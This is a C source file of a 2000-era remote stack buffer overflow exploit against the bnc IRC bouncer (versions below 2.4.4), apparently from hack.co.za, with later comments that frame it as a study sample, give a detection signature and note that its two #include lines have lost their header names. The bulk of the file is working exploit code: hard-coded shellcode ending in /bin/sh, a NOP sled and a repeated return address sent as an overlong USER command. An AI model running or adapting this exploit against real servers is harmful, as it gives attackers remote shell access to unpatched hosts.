/* bnc remote buffer overflow for linux x86 (w/o stack-non-exec patch) by duke (duke@viper.net.au) works on versions < 2.4.4 offsets: slackware: 0 redhat: 400->1000 special thanks to stranJer! :) greets to everyone (plaguez, horiz0n, dpr, kod, f1ex, sewid, antilove, tewl, dmess0r, stranJer , all of #!ADM :) and everyone at el8.org ) */

/*
 * Historical (2000) proof-of-concept for a stack buffer overflow in the
 * bnc IRC bouncer, kept here as a study sample for the vulnerability class.
 * The header above is the only provenance on this page: affected versions
 * are given as "< 2.4.4", and the technique assumes an executable stack
 * ("w/o stack-non-exec patch"), so a non-executable stack, stack canaries
 * or ASLR -- none of which this code accounts for -- defeat it.  The fix
 * for the underlying bug is upgrading bnc past the version named above.
 *
 * Defender-relevant shape of what this program emits (derived from the code
 * below, not from external knowledge): a single "USER " command whose
 * argument is BUFSIZE (2000) bytes, consisting mostly of 0x90 bytes with a
 * 4-byte value repeated in the tail.  A USER command of that length at a
 * bouncer's listening port is a usable detection signature.
 */

/* NOTE(extraction): the two #include directives appear to have lost their
 * header names when this page was flattened; as written the file does not
 * preprocess.  The original header names are not recoverable from the page. */
#include
#include

/* Guessed address on the target's stack; argv[1] is added to it to account
 * for per-distribution stack layouts (see "offsets" in the header). */
#define RET 0xbffff814
/* Total size of the overflowing buffer sent as the USER argument. */
#define BUFSIZE 2000
/* Byte position where the 0x90 sled / payload region ends and the repeated
 * address block begins. */
#define LEN 1000

/* Hard-coded x86 Linux payload.  The page does not document its syscalls;
 * the only readable part is the trailing literal "/bin/sh".  Treated as
 * opaque here -- no claim is made about what it does beyond that. */
char shellcode[] =
  "\x33\xdb\x33\xc0\xb0\x29\xcd\x80\x33\xc0\xb0\x29\xcd\x80"
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/bin/sh";

/*
 * Builds the overflow string and writes it to stdout.  The page contains no
 * networking code at all: delivery to the bouncer happens outside this
 * program (the `sockfd` local is declared but never used).
 *
 * argv[1] (optional): decimal offset added to RET.  It is parsed with atoi,
 *   so non-numeric input silently becomes 0, the same as omitting it.
 *
 * Returns nothing (`void main` as written on the page).
 */
void main (int argc, char **argv)
{
  char buf[BUFSIZE];
  int sockfd, i, offset;        /* sockfd is never used: nothing here opens a socket */

  /* Optional stack-offset argument for the RET guess. */
  if (argc == 2)
    {
      offset = atoi (argv[1]);
    }
  else
    {
      offset = 0;
    }

  /* Fill the whole buffer with 0x90 (x86 NOP): a tolerance zone so that an
   * imprecise RET guess still lands inside the payload region. */
  memset (buf, '\x90', BUFSIZE);

  /* From LEN to the end, write the guessed address every 4 bytes so that the
   * saved return address, wherever it lies within the overflowed range, is
   * overwritten with the guess.  Writing through a `long *` cast into a char
   * array is a strict-aliasing and alignment concern in general C; it was
   * benign on the 32-bit target this was written for. */
  for (i = LEN; i < BUFSIZE - 4; i += 4)
    *(long *) &buf[i] = RET + offset;

  /* Place the payload so that it ends exactly at LEN, immediately before the
   * address block. */
  memcpy (buf + (LEN - strlen (shellcode)), shellcode, strlen (shellcode));

  /* Prefix the IRC USER command; the overlong argument that follows is what
   * overflows the server-side buffer. */
  memcpy (buf, "USER ", 5);

  /* No terminator is written: every byte of buf is non-zero (0x90 bytes, the
   * payload, and the address bytes), so "%s" reads past the end of the array
   * until it happens upon a zero byte -- undefined behavior in the emitter. */
  printf ("%s", buf);
}
/* www.hack.co.za [2000]*/